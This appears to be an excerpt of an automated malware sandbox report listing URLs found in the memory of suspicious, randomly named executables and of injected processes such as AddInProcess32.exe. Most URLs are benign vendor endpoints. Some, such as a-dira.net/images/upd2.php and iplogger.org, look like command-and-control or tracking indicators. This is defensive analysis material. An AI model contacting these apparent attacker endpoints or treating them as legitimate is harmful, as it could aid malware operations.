Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1282882303.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1279675967.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284229883.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.360totalsecurity.com/zh-cn/privacy.html7
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1282882303.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1279675967.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284229883.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.360totalsecurity.com/zh-cn/privacy.html=7
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002341000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284229883.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.360totalsecurity.com/zh-tw/license.html
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.360totalsecurity.com/zh-tw/license.html.ra=7
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1282882303.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1279675967.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284229883.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.360totalsecurity.com/zh-tw/license.htmler=
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1282882303.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1279675967.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284229883.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.360totalsecurity.com/zh-tw/license.htmlinsku
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002341000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.360totalsecurity.com/zh-tw/privacy.html
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1282882303.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1279675967.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284229883.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.360totalsecurity.com/zh-tw/privacy.html7
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1282882303.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1279675967.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284229883.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.360totalsecurity.com/zh-tw/privacy.html=0
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284229883.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.360totalsecurity.com/zh-tw/privacy.html=7
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000000.1257115899.0000000000471000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.360totalsecurity.comIDS_LOAD_P2SP_ERROR/tswin10/tsewin10IDS_UPDATE_QUESTIONIDS_UPDATE_WAR
Source: explorer.exe, 00000024.00000003.2274608551.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000024.00000000.1465540565.000000000C426000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: svchost.exe, 00000009.00000002.1401955165.000002B171613000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.bingmapsportal.comc
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426040285.000000000582C000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1430346079.0000000005F14000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420334429.0000000005373000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417014257.0000000005150000.00000004.00000020.00020000.00000000.sdmp, o2i3jroi23joj23ikrjokij3oroi[1].exe.19.dr	String found in binary or memory: http://www.borland.com/namespaces/TypesU
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426040285.000000000582C000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1430346079.0000000005F14000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420334429.0000000005373000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417014257.0000000005150000.00000004.00000020.00020000.00000000.sdmp, o2i3jroi23joj23ikrjokij3oroi[1].exe.19.dr	String found in binary or memory: http://www.borland.com/namespaces/Typeshhttp://www.borland.com/namespaces/Types-IWSDLPublish
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: explorer.exe, 00000024.00000000.1373594900.00000000071B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.foreca.com
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1305731063.00000000004E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C57000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://yip.su
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://a-dira.net
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C87000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002ABC000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.000000000299B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002D09000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.00000000029A3000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.000000000299F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002994000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.00000000029C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://a-dira.net/images/upd2.php
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002D19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://a-dira.net/images/upd2.php$n
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
Source: svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/Wizard/Password/Change?id=806015
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600e
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/msangc
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376112342.000001F4D8F57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/msangcwam
Source: explorer.exe, 00000024.00000000.1419179675.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420338649.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426212707.0000000004460000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426427943.0000000004461000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420528579.0000000004FA0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1418207825.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/dotnet-core-applaunch?
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420338649.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426212707.0000000004460000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426427943.0000000004461000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420528579.0000000004FA0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1418207825.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/dotnet-core-applaunch?framework=&framework_version=missing_runtime=true&arch=&rid=
Source: lgX7lgUL1w.exe	String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.tiktok.com
Source: explorer.exe, 00000024.00000000.1419179675.000000000913F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000024.00000000.1419179675.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000024.00000000.1419179675.0000000008DA6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000024.00000000.1419179675.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000024.00000000.1373594900.0000000007276000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1315897235.00000000005A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.myip.com/
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1315587677.00000000005BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.myip.com/$V
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1315587677.00000000005BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.myip.com/HV
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1315587677.00000000005BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.myip.com/hV
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1315587677.00000000005BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.myip.com/lV
Source: svchost.exe, 00000009.00000003.1390262007.000002B171657000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1404251431.000002B171658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: explorer.exe, 00000024.00000000.1419179675.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ampproject.org
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C4D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CE9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C87000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B2D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CC5000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, aQ7CUsrnipUkMOjgF0nKuX1q.exe.5.dr, OEf7asb27AljF1U8YK72cN6l.exe.5.dr	String found in binary or memory: https://cdn.iplogger.org/favicon.ico
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C4D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CE9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C87000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B2D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CC5000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, aQ7CUsrnipUkMOjgF0nKuX1q.exe.5.dr, OEf7asb27AljF1U8YK72cN6l.exe.5.dr	String found in binary or memory: https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;background-repeat:no-rep
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.syndication.twimg.com
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1337856938.0000000003812000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore/detail/360-internet-protection/glcimepnljoholdmjchkloafkggfoijhht
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1334164364.0000000004E44000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1335128422.0000000004F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxcom.google.chrome.wdwedprofirefox.exeeEopennewIE.Asso
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://connect.facebook.net
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C4D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002990000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CE9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C87000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B2D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CC5000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C3D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, aQ7CUsrnipUkMOjgF0nKuX1q.exe.5.dr, OEf7asb27AljF1U8YK72cN6l.exe.5.dr	String found in binary or memory: https://counter.yadro.ru/hit?
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: svchost.exe, 00000009.00000003.1390262007.000002B171657000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1404251431.000002B171658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
